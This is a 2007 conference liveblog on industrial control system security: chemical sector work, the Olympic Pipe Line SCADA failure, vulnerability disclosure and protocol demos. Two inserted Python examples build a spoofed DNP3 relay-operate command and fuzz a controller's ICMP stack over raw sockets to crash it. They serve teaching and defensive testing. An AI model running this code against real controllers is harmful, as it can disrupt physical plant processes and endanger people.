Weiss Event Day Two
Back again semi-liveblogging on day two at Joe Weiss’s conference. I think the day two agenda is the most interesting with sessions in the afternoon on field device vulnerabilities. Check back often for updates.
9:15AM - An overview of the Chemical Sector's efforts in control system security is presented by two individuals from Dow Chemical. Two great things about the Chemical Sector:
1. The large companies from the Chemical Sector are some of the most active participants and leaders in the control system security standards efforts.
2. The Chemical Sector makes their work product in this area available to everyone at www.chemicalcybersecurity.com.
The chemical industry will be participating in DHS's Cyber Storm II.
A brief and interesting discussion in the Q&A on the new DHS regulations on the chemical sector. DHS's Chemical Security Compliance Sector is working out the details to implement the law now. The large Tier 1 companies will be audited in person by DHS or their representatives. The regulations are "primarily physical with cyber overtones". If you are familiar with the RAM family of risk assessment methodologies (such as Sandia's RAM-W for water and RAMCAP for chemical), the emphasis on physical security is similar.
11:45AM - Marshall Abrams from MITRE, with help from Joe Weiss, did a case study on the Olympic Pipe Line incident in Bellingham, WA on June 10, 1999. While the cause of the rupture and the ensuing fire and deaths was not a cyber security incident, the fact that the leak went undetected for approximately 90 minutes was a failure of the SCADA and leak detection systems. See the description of the SCADA failures starting on page 61 of the NTSB report.
Interestingly, some of the key personnel invoked their Fifth Amendment rights and refused to testify, and some logs were missing. There are still some unknowns as to what actually caused the SCADA failure.
2:15PM - Perry Pederson of DHS NCSD is talking about one of Digital Bond’s hot topics, vulnerability disclosure. There is a large US-CERT part to this story. It is good to see DHS promoting this.
I wish DHS would use their muscle and power of the purse to force the National Labs to report identified vulnerabilities to US-CERT. There are lab-vendor agreements that prevent this now, but the labs have enough clout in this industry to include a "report to US-CERT within 3 or 6 months" clause in those agreements.
3:15PM - A couple of live demos this afternoon. First Mark Hadley of PNL showed that he could run a DoS attack or control a remote device via the DNP3 protocol. This is true of most control protocols because they have no user or device authentication and no integrity protection on the data: any host that can reach the device over the network can issue it commands, and the device has no way to tell a legitimate master from an attacker. This seems old hat and has been shown for years, but it is effective for those new to control system security. Watch. See me change the lights. Watch me turn the lights out.
Of course Secure DNP3, which adds authentication to the protocol, has the promise to change this.
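To make the "no authentication" point concrete, here is an added example; it is not code from the original post or from the PNL demo. It builds a real DNP3 link frame (start bytes, length, control, addresses, the DNP CRC-16 on the header and on every 16-byte data block) carrying a DIRECT_OPERATE request for a control relay output, and then shows everything a plain outstation can check on receipt: framing, CRCs and the destination address. The source address, point number and key material are made up, and the HMAC at the end illustrates the principle behind Secure DNP3 (bind each command to a shared key and a fresh challenge), not the actual IEEE 1815 Secure Authentication message format.

```python
"""Added example (not from the original post or the PNL demo): a DNP3 direct-operate
request in a link frame, and what a plain outstation can actually check on receipt.
Addresses, point numbers and the key are made up for the demonstration."""
import hashlib
import hmac
import struct

DNP3_START = b"\x05\x64"


def dnp3_crc(data: bytes) -> int:
    """DNP3 link-layer CRC-16: polynomial 0x3D65 (reflected 0xA6BC), init 0, final XOR 0xFFFF."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA6BC if crc & 1 else crc >> 1
    return (crc ^ 0xFFFF) & 0xFFFF


def build_link_frame(control: int, dest: int, src: int, user_data: bytes = b"") -> bytes:
    """Start bytes, length, control, dest, src, header CRC, then 16-byte blocks each with
    its own CRC. Note what is absent: nothing in the frame proves who sent it."""
    header = DNP3_START + bytes([5 + len(user_data), control]) + struct.pack("<HH", dest, src)
    frame = header + struct.pack("<H", dnp3_crc(header))
    for i in range(0, len(user_data), 16):
        block = user_data[i:i + 16]
        frame += block + struct.pack("<H", dnp3_crc(block))
    return frame


def build_direct_operate(app_seq: int, index: int, control_code: int) -> bytes:
    """Transport header + application request: DIRECT_OPERATE (FC 0x05) on one
    Control Relay Output Block (group 12, variation 1) at the given point index."""
    transport = bytes([0xC0 | (app_seq & 0x3F)])        # FIR | FIN | sequence
    app_ctrl = bytes([0xC0 | (app_seq & 0x0F)])         # FIR | FIN | sequence
    function = b"\x05"                                  # DIRECT_OPERATE
    obj_header = bytes([12, 1, 0x17, 1, index & 0xFF])  # g12v1, qualifier 0x17: 1-byte count, 1-byte index
    crob = struct.pack("<BBIIB", control_code, 1, 0, 0, 0)  # code, count, on-time, off-time, status
    return transport + app_ctrl + function + obj_header + crob


def outstation_accepts(frame: bytes, my_address: int) -> bool:
    """Everything a plain DNP3 outstation can verify: framing, CRCs and destination.
    Any host on the network that can reach it passes this check."""
    if len(frame) < 10 or frame[:2] != DNP3_START:
        return False
    header, header_crc = frame[:8], struct.unpack("<H", frame[8:10])[0]
    if dnp3_crc(header) != header_crc:
        return False
    length, dest = header[2], struct.unpack("<H", header[4:6])[0]
    if dest != my_address:
        return False
    body, user_data = frame[10:], b""
    while body:
        if len(body) < 3:
            return False
        n = min(16, len(body) - 2)
        block, block_crc = body[:n], struct.unpack("<H", body[n:n + 2])[0]
        if dnp3_crc(block) != block_crc:
            return False
        user_data += block
        body = body[n + 2:]
    return len(user_data) == length - 5


def tag_fragment(key: bytes, challenge: bytes, fragment: bytes) -> bytes:
    """The principle behind Secure DNP3 (illustration only, not the IEEE 1815 SA format):
    an HMAC over a fresh challenge and the fragment, so a spoofed or replayed command fails."""
    return hmac.new(key, challenge + fragment, hashlib.sha256).digest()[:16]


def verify_fragment(key: bytes, challenge: bytes, fragment: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(tag_fragment(key, challenge, fragment), tag)


def demo() -> dict:
    outstation_addr, attacker_addr = 1, 0xBEEF          # made-up addresses
    # LATCH_ON (0x03) on point 0: "watch me change the lights"
    fragment = build_direct_operate(app_seq=1, index=0, control_code=0x03)
    # link control 0xC4: DIR=1, PRM=1, function 4 = unconfirmed user data
    spoofed = build_link_frame(0xC4, outstation_addr, attacker_addr, fragment)
    key, challenge = b"shared-master-key", b"\x00\x01\x02\x03"  # made-up key material
    tag = tag_fragment(key, challenge, fragment)
    retargeted = fragment[:7] + b"\x07" + fragment[8:]  # same command, point index changed to 7
    return {
        "spoofed_command_accepted": outstation_accepts(spoofed, outstation_addr),
        "hmac_with_right_key": verify_fragment(key, challenge, fragment, tag),
        "hmac_with_wrong_key": verify_fragment(b"attacker-guess", challenge, fragment, tag),
        "hmac_after_tamper": verify_fragment(key, challenge, retargeted, tag),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The CRC routine reproduces the well-known reset-link frame `05 64 05 C0 01 00 00 04 E9 21`, so the framing is the real thing rather than a sketch. The outstation logic accepts the command from source address 0xBEEF as readily as from a legitimate master; the only thing the CRCs defend against is line noise, which is the whole point of the demo above.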
Following Mark is a team from Mu Security. They are demonstrating their fuzzing/security analysis platform on the ICMP and TCP protocols in a controller which I'm tempted to name, but will not. They claimed to find 500 vulnerabilities in the controller's ICMP implementation alone. The impact of the vulnerabilities varies from a 4-second hang to requiring a reboot. Run a series of fuzzed packets and watch the controller crash.
Loyal readers of this blog, and users of controllers, know how fragile many controller protocol stacks are. This is an effective demo and highlights a large problem.
The issue that controller vendors often purchase their protocol stacks from third parties is raised. This is a problem when it comes to remediation: the vendor may not own or even have the source for the stack, so a fix depends on the stack supplier and then on a firmware release, and the same flaw can turn up in every product built on that stack.
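An added example of the kind of test the Mu demo ran, written for this page rather than taken from the original post or from Mu Security's platform: a minimal ICMP fuzz harness that generates a deterministic stream of malformed echo requests (bad type/code pairs, wrong checksums, oversized and truncated packets, random bit flips), sends them from a raw socket, and after each one re-probes with a clean echo to measure how long the controller took to answer again. The hang and "reboot needed" thresholds, the identifier 0x4D55 and the target address are assumptions for the demonstration; the sending functions need root or CAP_NET_RAW and a lab device you own, since knocking it over is the expected outcome.

```python
"""Added example (not Mu Security's platform or code from the original post):
a minimal ICMP fuzz harness for a controller's IP stack, plus the recovery-time
bucketing that turns "it crashed" into a reproducible result."""
import random
import socket
import struct
import time


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by ICMP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def icmp_packet(itype: int, code: int, ident: int, seq: int, payload: bytes = b"") -> bytes:
    header = struct.pack("!BBHHH", itype, code, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", itype, code, csum, ident, seq) + payload


def fuzz_cases(seed: int, count: int, ident: int = 0x4D55):
    """Deterministic stream of (label, packet): a clean echo first, then mutations of the
    kinds a bare-bones controller stack tends to mishandle. Same seed, same cases."""
    rng = random.Random(seed)
    payload = b"A" * 32
    yield "baseline echo", icmp_packet(8, 0, ident, 0, payload)
    for seq in range(1, count + 1):
        kind = rng.choice(("type_code", "bad_checksum", "oversized", "truncated", "bitflip"))
        good = icmp_packet(8, 0, ident, seq, payload)
        if kind == "type_code":       # reserved or unexpected type/code pairs
            pkt = icmp_packet(rng.randrange(256), rng.randrange(256), ident, seq, payload)
        elif kind == "bad_checksum":  # well-formed, but the checksum field is wrong
            wrong = struct.unpack("!H", good[2:4])[0] ^ rng.randrange(1, 0x10000)
            pkt = good[:2] + struct.pack("!H", wrong) + good[4:]
        elif kind == "oversized":     # payload beyond an Ethernet MTU; the IP layer fragments it
            junk = bytes(rng.getrandbits(8) for _ in range(rng.randrange(1500, 4000)))
            pkt = icmp_packet(8, 0, ident, seq, junk)
        elif kind == "truncated":     # shorter than the 8-byte ICMP header
            pkt = good[:rng.randrange(1, 8)]
        else:                         # one to four random bit flips anywhere in the packet
            buf = bytearray(good)
            for _ in range(rng.randrange(1, 5)):
                buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
            pkt = bytes(buf)
        yield f"{seq:03d} {kind}", pkt


def classify(recovery_seconds, hang_threshold: float = 1.0, dead_threshold: float = 30.0) -> str:
    """Bucket a case by how long the target took to answer a plain echo afterwards
    (thresholds are assumptions; tune them to the device's normal response time)."""
    if recovery_seconds is None or recovery_seconds >= dead_threshold:
        return "unresponsive"      # a reboot (or a human) is needed
    if recovery_seconds >= hang_threshold:
        return "hang"
    return "ok"


def time_to_recover(sock, target: str, ident: int, max_wait: float):
    """Re-probe with clean echoes until an echo reply carrying our ident comes back."""
    start = time.monotonic()
    seq = 0
    while time.monotonic() - start < max_wait:
        seq += 1
        sock.sendto(icmp_packet(8, 0, ident, seq), (target, 0))
        try:
            data, _ = sock.recvfrom(2048)
        except socket.timeout:
            continue
        icmp = data[20:]           # raw ICMP sockets return the IPv4 header; 20 bytes assumes no options
        if len(icmp) >= 8 and icmp[0] == 0 and struct.unpack("!H", icmp[4:6])[0] == ident:
            return time.monotonic() - start
    return None


def run_campaign(target: str, seed: int = 1, count: int = 200, max_wait: float = 60.0) -> dict:
    """Send each case and record how the device fares. Needs root/CAP_NET_RAW and a lab target."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    sock.settimeout(1.0)
    results = {}
    for label, pkt in fuzz_cases(seed, count):
        sock.sendto(pkt, (target, 0))
        results[label] = classify(time_to_recover(sock, target, 0x4D55, max_wait))
    return results
```

Two details matter more than the mutation list. The case stream is seeded, so a "4 second hang on case 137" can be handed to the vendor (or the stack supplier) and replayed exactly; and the harness measures recovery rather than just whether a reply came back, which is what separates a stack that drops a bad packet (correct) from one that stalls its scan cycle or needs a power cycle.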
Author: Dale Peterson
Posted: August 15th, 2007 under Conferences.